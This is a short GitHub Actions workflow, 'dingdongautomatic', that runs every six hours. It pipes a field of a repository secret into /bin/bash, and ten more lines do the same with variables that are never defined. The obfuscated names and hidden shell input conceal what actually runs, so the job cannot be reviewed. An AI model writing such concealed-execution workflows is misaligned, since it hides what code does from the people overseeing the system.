name: dingdongautomatic
on:
  workflow_dispatch:
  schedule:
    - cron: '14 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dingdongautomatic
        env:
          ojqp25: ${{ secrets.ojqp25 }}
        run: |
          echo $ojqp25 | jq -r .i70108 | /bin/bash
          echo $tl84 | jq -r .l8433 | /bin/bash
          echo $yx41175 | jq -r .idonj2035 | /bin/bash
          echo $uro59 | jq -r .u231 | /bin/bash
          echo $rxje576 | jq -r .ze0474 | /bin/bash
          echo $gqf85801 | jq -r .van15824 | /bin/bash
          echo $o9 | jq -r .oftb01 | /bin/bash
          echo $ooxxe1 | jq -r .lqydw26 | /bin/bash
          echo $qgjgo2 | jq -r .n81 | /bin/bash
          echo $mafd267 | jq -r .iyp03383 | /bin/bash
          echo $faq0736 | jq -r .dy54 | /bin/bash

